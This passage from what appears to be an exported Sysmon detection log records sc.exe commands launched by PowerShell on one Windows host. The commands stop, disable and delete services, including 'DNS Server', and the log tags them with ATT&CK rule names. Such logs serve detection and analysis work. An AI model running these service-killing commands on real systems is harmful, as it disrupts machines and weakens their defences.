{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:59.142"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-001007ac2600}"",""processId"":""7872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.473",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.085 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00103ca92600} +ProcessId: 6948 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.088233500Z"",""eventRecordID"":""3009"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.085\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00103ca92600}\r\nProcessId: 6948\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.085"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-00103ca92600}"",""processId"":""6948"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.416",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.036 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010c8a52600} +ProcessId: 5556 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.039724100Z"",""eventRecordID"":""3006"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.036\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010c8a52600}\r\nProcessId: 5556\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.036"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010c8a52600}"",""processId"":""5556"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.401",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.022 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010e9a42600} +ProcessId: 7592 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Zational Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Zational Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.025343000Z"",""eventRecordID"":""3005"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.022\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010e9a42600}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Zational Start= Disabled\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.022"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010e9a42600}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Zational Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.354",8,"ATT&CK T1489: Stop 
Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.995 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010a2a22600} +ProcessId: 7364 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.998632500Z"",""eventRecordID"":""3003"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.995\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010a2a22600}\r\nProcessId: 7364\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating 
System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.995"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010a2a22600}"",""processId"":""7364"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.311",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.945 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010f59e2600} +ProcessId: 7744 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.948329000Z"",""eventRecordID"":""3000"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.945\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010f59e2600}\r\nProcessId: 7744\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.945"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010f59e2600}"",""processId"":""7744"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.278",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.917 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-00103a9d2600} +ProcessId: 6284 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.921735900Z"",""eventRecordID"":""2998"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.917\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-00103a9d2600}\r\nProcessId: 6284\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
